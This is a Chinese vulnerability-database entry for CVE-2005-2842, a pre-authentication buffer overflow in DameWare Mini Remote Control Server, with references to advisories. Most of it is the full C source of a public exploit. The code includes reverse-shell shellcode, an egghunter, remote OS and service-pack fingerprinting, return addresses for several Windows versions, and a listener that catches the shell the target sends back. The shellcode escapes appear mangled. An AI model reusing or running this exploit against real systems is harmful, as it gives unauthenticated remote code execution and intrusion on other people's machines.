DameWare Mini Remote Control Server dwrcs.exe缓冲区溢出漏洞
| 漏洞ID | 1109046 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2005-08-31 | 更新时间 | 2005-10-20 |
![图片[1]-DameWare Mini Remote Control Server dwrcs.exe缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2005-2842 |
![图片[2]-DameWare Mini Remote Control Server dwrcs.exe缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200509-091 |
| 漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
MiniRemoteControl是32位Windows操作系统上的远程控制系统,允许管理员远程控制LAN或WAN中的机器。DameWareMiniRemoteControlServer中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以远程执行任意代码。起因是在检查用户名时不安全的调用了lstrcpyA函数。未经认证的远程攻击者可以通过向DameWareRemoteControlServer的默认监听端口6129TCP发送特制报文来利用这个漏洞。
|漏洞EXP
/************************************************************************************************
* _ ______
* (_)___ ____ ____ / ____/
* / / __ / __ / __ /___
* / / /_/ / / / / /_/ /___/ /
* __/ / .___/_/ /_/____/_____/
* /___/_/======================
*************************************************************************************************
*
* DameWare Mini Remote Control Client Agent Service
* Another Pre-Authentication Buffer Overflow
* By Jackson Pollocks No5
* www.jpno5.com
*
*
* Summary
* +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* DameWare Mini Remote Control is "A lightweight remote control intended primarily
* for administrators and help desks for quick and easy deployment without
* external dependencies and machine reboot.
*
* Developed specifically for the 32-bit Windows environment (Windows 95/98/Me/NT/2000/XP),
* DameWare Mini Remote Control is capable of using the Windows challenge/response authentication
* and is able to be run as both an application and a service.
*
* Some additional features include View Only, Cursor control, Remote Clipboard, Performance Settings,
* Inactivity control, TCP only, Service Installation and Ping."
*
* A buffer overflow vulnerability can be exploited remotely by an unauthenticated attacker
* who can access the DameWare Mini Remote Control Server.
*
* By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP.
* An attacker can construct a specialy crafted packet and exploit this vulnerability.
* The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.
*
*
* Severity: Critical
*
* Impact: Code Execution
*
* Local: Yes
*
* Remote: Yes
*
* Patch: Download version 4.9.0 or later and install over your existing installation.
* You can download the latest version of your DameWare Development Product at
* http://www.dameware.com/download
*
* Details: Affected versions will be any ver in above 4.0 and prior to 4.9
* of the Mini Remote Client Agent Service (dwrcs.exe).
*
* Discovery: i discovered this while using the dameware mini remote control client.
* i accidently pasted in a large string of text instead of my username.
* Clicking connect led to a remote crash of the application server.
*
* Credits: Can't really remember who's shellcode i used, more than likely it was
* written by Brett Moore.
*
* The egghunter was written by MMiller(skape). {Which kicks ass btw}
*
* Thanks to spoonm for tracking that NtAccessCheckAndAuditAlarm
* universal syscall down.
*
* Some creds to Adik as well, i did code my own exploit but it had none
* of that fancy shit like OS and SP detection. So basicly i just modded
* the payload from the old dameware exploit(ver 3.72).
*
* A little cred to me as well, after all i did put all them guys great
* work together to make something decent :)
*
************************************************************************************/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")
#define ACCEPT_TIMEOUT 25
#define RECVTIMEOUT 15
#define UNKNOWN 0
#define WIN2K 1
#define WINXP 2
#define WIN2K3 3
#define WINNT 4
unsigned char rshell[] = {
"x41x42x41x42x41x42x41x42x90x90x90x90x90x90x90x90"// For The Egghunter
"x90xFCx6AxEBx52xE8xF9xFFxFFxFFx60x8Bx6Cx24x24x8B"// Reverse Shell
"x45x3Cx8Bx7Cx05x78x01xEFx83xC7x01x8Bx4Fx17x8Bx5F"
"x1Fx01xEBxE3x30x49x8Bx34x8Bx01xEEx31xC0x99xACx84"
"xC0x74x07xC1xCAx0Dx01xC2xEBxF4x3Bx54x24x28x75xE3"
"x8Bx5Fx23x01xEBx66x8Bx0Cx4Bx8Bx5Fx1Bx01xEBx03x2C"
"x8Bx89x6Cx24x1Cx61xC3x31xC0x64x8Bx40x30x8Bx40x0C"
"x8Bx70x1CxADx8Bx40x08x5Ex68x8Ex4Ex0ExECx50xFFxD6"
"x31xDBx66x53x66x68x33x32x68x77x73x32x5Fx54xFFxD0"
"x68xCBxEDxFCx3Bx50xFFxD6x5Fx89xE5x66x81xEDx08x02"
"x55x6Ax02xFFxD0x68xD9x09xF5xADx57xFFxD6x53x53x53"
"x53x43x53x43x53xFFxD0x68x90x90x90x90x66x68x90x90"
"x66x53x89xE1x95x68xECxF9xAAx60x57xFFxD6x6Ax10x51"
"x55xFFxD0x66x6Ax64x66x68x63x6Dx6Ax50x59x29xCCx89"
"xE7x6Ax44x89xE2x31xC0xF3xAAx95x89xFDxFEx42x2DxFE"
"x42x2Cx8Dx7Ax38xABxABxABx68x72xFExB3x16xFFx75x28"
"xFFxD6x5Bx57x52x51x51x51x6Ax01x51x51x55x51xFFxD0"
"x68xADxD9x05xCEx53xFFxD6x6AxFFxFFx37xFFxD0x68xE7"
"x79xC6x79xFFx75x04xFFxD6xFFx77xFCxFFxD0x68xEFxCE"
"xE0x60x53xFFxD6xFFxD0"
};
unsigned char buff[40] = {
"x30x11x00x00x00x00x00x00xC3xF5x28x5Cx8FxC2x0Dx40"// OS Detection
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x01x00x00x00"
};
unsigned char fpay[] = {
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"// Egghunter
"xefxb8x41x42x41x42x8bxfaxafx75xeaxafx75xe7xffxe7"
"xccxccxccxccxccxccxccxccxccxccxccxccxccxccxccxcc"
};
long ip(char *hostname);
void shell (int sock);
int check(char *host,unsigned short tport, unsigned int *sp);
struct timeval tv;
fd_set fds;
char buff1[5000]="";
struct spl{
unsigned long eip; char off[20];
};
struct{
char type[10]; struct spl sp[7];
}
target_os[]={{ //Could proberly be doing with some better offsets
"UNKNOWN" ,{{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN 2000" ,{{ 0x750362c3,"ws2_32.dll" },{ 0x75035173,"ws2_32.dll" },{ 0x7C2FA0F7,"ws2_32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN 2003" ,{{ 0x77E216B8,"advapi32.dll" },{ 0x77FD1F89,"ntdll.dll" },{ 0x77E216B8,"ntdll.dll" },{ 0x77E216B8,"advapi32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{
"WIN NT4" ,{{ 0x77777777,"unknown.dll" },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll" },{ 0x77777772,"unknown.dll" },{ 0x77f32836,"kernel32.dll" }}}
};
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP, localTCP, inAccTCP;
int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;
unsigned char packet[24135]="";
unsigned short lport, tport;
unsigned long lip, tip;
unsigned int ser_p=0;
int ver=0;
printf("nn ====== D4m3w4r3 eXpLo1t, By jpno5 ======n");
printf(" ====== http://www.jpno5.com ======nn");
if(argc < 5){ printf("[+] %s Target_Ip Target_Port Return_Ip Return_Portnn",argv[0]);return 1;}
WSAStartup(0x0202, &wsaData);
tip=ip(argv[1]);
tport = atoi(argv[2]);
lip=inet_addr(argv[3])^(long)0x00000000;
lport=htons(atoi(argv[4]))^(short)0x0000;
memcpy(&rshell[184], &lip, 4);
memcpy(&rshell[190], &lport, 2);
memset(&targetTCP, 0, sizeof(targetTCP));memset(&localTCP, 0, sizeof(localTCP));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = tip;
targetTCP.sin_port = htons(tport);
localTCP.sin_family = AF_INET;
localTCP.sin_addr.s_addr = INADDR_ANY;
localTCP.sin_port = htons((unsigned short)atoi(argv[4]));
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("ttt[ FAILED ]n");
WSACleanup();
return 1;
}
if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("ttt[ FAILED ]n");
WSACleanup();
return 1;
}
printf("[#] Listening For Shell On: %s...",argv[4]);
if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0){
printf("ttn Binding To Port: %s Failed! Make Sure It Aint In Use Arleadyn",argv[4]);
WSACleanup();
return 1;
}
if(listen(localSockTCP,1) != 0){
printf("ttt[ FAILED ]nFailed to listen on port: %s!n",argv[4]);
WSACleanup();
return 1;
}
ver = check(argv[1],(unsigned short)atoi(argv[2]),&ser_p);
printf("n[*] Target: %s SP: %d...",target_os[ver].type,ser_p);
memcpy(packet,"x10x27",2);
memcpy(packet+0xc4+9,rshell,strlen(rshell));
*(unsigned long*)&packet[516] = target_os[ver].sp[ser_p].eip;
memcpy(packet+520,fpay,strlen(fpay));
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
printf("n[x] Connection to host failed!n");
WSACleanup();
exit(1);
}
switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;FD_ZERO(&fds);
FD_SET(sockTCP,&fds);
if((select(1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);}else{
printf("[x] Timeout! Failed to recv packet.n");
exit(1);
}
memset(buff1,0,sizeof(buff1));
switchon=0;ioctlsocket(sockTCP,FIONBIO,&switchon);
if (send(sockTCP, buff, sizeof(buff),0) == -1){
printf("[x] Failed to inject packet!n");
WSACleanup();
return 1;
}
switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;tv.tv_usec = 0;
FD_ZERO(&fds);FD_SET(sockTCP,&fds);
if((select(sockTCP+1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);switchon=0;
ioctlsocket(sockTCP,FIONBIO,&switchon);
if (send(sockTCP, packet, sizeof(packet),0) == -1){
printf("[x] Failed to inject packet! n");
WSACleanup();
return 1;
}
}else{
printf("n[x] Timedout! Failed to receive packet!n");
WSACleanup();
return 1;
}
closesocket(sockTCP);
printf("n[*] Waiting for Shell...r");
switchon=1;
ioctlsocket(localSockTCP,FIONBIO,&switchon);
tv.tv_sec = ACCEPT_TIMEOUT;
tv.tv_usec = 0;FD_ZERO(&fds);
FD_SET(localSockTCP,&fds);
if((select(1,&fds,0,0,&tv))>0){
acsz = sizeof(inAccTCP);
accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz);
printf("n[*] Enjoy...nn");
shell(accSockTCP);
}else{
printf("n[x] Exploit Failed! Proberly Patchedn");
WSACleanup();
}
return 0;
}
long ip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
printf("[x] Failed to resolve host: %s!nn",hostname);
WSACleanup();exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);}return ipaddr;}
void shell (int sock){
struct timeval tv;int length;
unsigned long o[2];
char buffer[1000];
tv.tv_sec = 1;tv.tv_usec = 0;
while (1){ o[0] = 1;o[1] = sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1){length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0) {
printf ("[x] Connection closed.n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0) {
printf ("[x] Connection closed.n");
WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer));
if (length <= 0) {
printf ("[x] Connection closed.n");
WSACleanup();return;}length = send(sock, buffer, length, 0);
if (length <= 0) {
printf ("[x] Connection closed.n");
WSACleanup();
return;
}}}}
int check(char *host,unsigned short tport, unsigned int *sp){
int sockTCP,switchon;
struct sockaddr_in targetTCP;
struct timeval tv;fd_set fds;
memset(&targetTCP,0,sizeof(targetTCP));
targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = inet_addr(host);targetTCP.sin_port = htons(tport);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("ttt[ FAILED ]n Socket not initialized! Exiting...n");
WSACleanup();
return 1;
}
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){
printf("[x] Connection to host failed!n");
WSACleanup();
exit(1);
}
switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);FD_SET(sockTCP,&fds);
if((select(1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);}
else{
printf("[x]Timedout! Doesn't Look Like A Dameware Servern");
exit(1);
}
switchon=0;
ioctlsocket(sockTCP,FIONBIO,&switchon);
if (send(sockTCP, buff, sizeof(buff),0) == -1){
printf("[x] Failedn");
WSACleanup();
return 1;
}
switchon=1;
ioctlsocket(sockTCP,FIONBIO,&switchon);
tv.tv_sec = RECVTIMEOUT;
tv.tv_usec = 0;FD_ZERO(&fds);
FD_SET(sockTCP,&fds);
if((select(sockTCP+1,&fds,0,0,&tv))>0){
recv(sockTCP, buff1, sizeof(buff1),0);
closesocket(sockTCP);
} else {
printf("n[x] Timedout!n");
WSACleanup();
return 1;
}
if(buff1[8]==5 && buff1[12]==0){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WIN2K;
} else if(buff1[8]==5 && buff1[12]==1){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WINXP;
} else if(buff1[8]==5 && buff1[12]==2){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WIN2K3;
} else if(buff1[8]==4){*sp = atoi(&buff1[37]);
closesocket(sockTCP);
return WINNT;
} else{
closesocket(sockTCP);
return UNKNOWN;
}
}
// milw0rm.com [2005-08-31]
|参考资料
来源:US-CERT
名称:VU#170905
链接:http://www.kb.cert.org/vuls/id/170905
来源:BID
名称:14707
链接:http://www.securityfocus.com/bid/14707
来源:MISC
链接:http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txt
来源:VUPEN
名称:ADV-2005-1596
链接:http://www.frsirt.com/english/advisories/2005/1596
来源:SECTRACK
名称:1014830
链接:http://securitytracker.com/id?1014830
来源:FULLDISC
名称:20050831Damewarecriticalhole
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html
来源:SECUNIA
名称:16655
链接:http://secunia.com/advisories/16655
相关推荐: Dell Latitude C800 Bios Suspended Session Bypassing Vulnerability
Dell Latitude C800 Bios Suspended Session Bypassing Vulnerability 漏洞ID 1102995 漏洞类型 Design Error 发布时间 2001-08-14 更新时间 2001-08-14 C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666